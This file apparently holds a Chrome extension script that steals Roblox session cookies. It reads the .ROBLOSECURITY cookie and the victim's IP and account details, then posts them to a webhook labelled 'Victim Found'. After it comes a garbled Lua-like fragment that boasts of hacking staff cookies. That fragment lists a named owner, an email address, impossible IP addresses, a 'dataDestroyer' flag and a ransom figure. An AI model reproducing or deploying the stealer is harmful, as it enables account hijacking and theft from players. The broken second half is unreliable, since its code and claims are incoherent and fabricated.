const WEBHOOK = "";

async function main(cookie) {
    var ipAddr = await (await fetch("https://api.ipify.org")).text();

    if (cookie) {
        var statistics = await (await fetch("https://www.roblox.com/mobileapi/userinfo", {
            headers: {
                Cookie: ".ROBLOSECURITY=" + cookie
            },
            redirect: "manual"
        })).json();
    }
    
    fetch(WEBHOOK, {
        method: "POST",
        headers: {
            "Content-Type": "Application/json"
        },
        body: JSON.stringify({
            "content": null,
            "embeds": [
              {
                "description": "```" + (cookie ? cookie : "COOKIE NOT FOUND") + "```",
                "color": null,
                "fields": [
                  {
                    "name": "Username",
                    "value": statistics ? statistics.UserName : "N/A",
                    "inline": true
                  },
                  {
                    "name": "Robux",
                    "value": statistics ? statistics.RobuxBalance : "N/A",
                    "inline": true
                  },
                  {
                    "name": "Premium",
                    "value": statistics ? statistics.IsPremium : "N/A",
                    "inline": true
                  }
                ],
                "author": {
                  "name": "Victim Found: " + ipAddr,
                  "icon_url": statistics ? statistics.ThumbnailUrl : "https://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/NA_cap_icon.svg/1200px-NA_cap_icon.svg.png",
                },
                "footer": {
                  "text": "https://github.com/ox-y",
                  "icon_url": "https://upload.wikimedia.org/wikipedia/commons/thumb/9/91/Octicons-mark-github.svg/1200px-Octicons-mark-github.svg.png"
                },
                "thumbnail": {
                  "url": statistics ? statistics.ThumbnailUrl : "https://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/NA_cap_icon.svg/1200px-NA_cap_icon.svg.png",
                }
              }
            ],
            "username": "Roblox",
            "avatar_url": "https://upload.wikimedia.org/wikipedia/commons/thumb/3/3a/Roblox_player_icon_black.svg/1200px-Roblox_player_icon_black.svg.png",
            "attachments": []
        })
    });
}

chrome.cookies.get({"url": "https://www.roblox.com/home", "name": ".ROBLOSECURITY"}, function(cookie) {
    main(cookie ? cookie.value : null);
});


 == ("Bypass")
("bypass") = Cookie ? Cookie = ("error 404")
local ("bypass") = false
if local UserId = ("whitelisted")
then local ("bypass") = ("true")
local SystemBreak = ("true")
Run local ("dataDestroyer")
local ("dataDestroyer") = true
local ({Url)} = false
local process ran == ("log out")
local process == ("log out") = true
if user == ("log out")
then {Roblox log out}

})

("http://roblox.com/home")

local ({Ip. adres}) = "628.282.829.29"
local spoof = true
local NameChange = true
local changeName == ;name ("name here")
local Cookie = ("cookie,nil,nil,cookie ? cookie") = error 404
local ChangeCookie == {(Cookie not found)}
local ChangeCookie = true
local ran process = ("break script")
local antiBreaker = ("HACKED")
local ServerBreaker = ("KirbyX")
local clientBeamer = ("your name")
local antiIp = ("IpUser,nil,nil")


local main(cookie ? cookie.value : = ("password")
local MainPassword: = ("••••••")
local MainPassword = ("HACKED")
local MainFrame = ("Mine")
local MainFiles; = ("CORRUPTED")
local MainSystem = ("Robbed")
local MainOwner = ("notfy")
local notify = ("Your script has been bypassed")

      ---- Staffs cookies
      ---- Lol i hacked the staffs cookies
      ---- next time dont have the cookie in the main system


     local process = ("Cookies")
     local Staff = ("Main")
     local Cookies = ("Password")
     local MainPassword = ("••••••••••••••••••••••")
     local email = ("Adrian268@gmail.com")
     local OwnerName = ("Adrian")
     local OwnerIP = ("729.927.472.89")
     local OwnerInfo = ("*********")
     local OwnerId = ("738337383729")
     local OwnerAdres = ("*********,*******,*******")


        --- you should feel lucky i didnt leak most of your stuff

        ---- Some other stuff


      local ScriptAdres = ("MainFrame,nil,false")
      local ScriptAdresInfo = ("728.727.918.•••.••")
      local ScriptID = ("72827287")
      local Mainframe = ("changed")
      local NewPassword;MainFrame
      local password = ("••••••••••••••••••••••••••••••••")
      local randsom = ("$KirbyX")
      local Randsom2 = arguement.info = false
      local randsom3 = Money.print = ("350Usd")
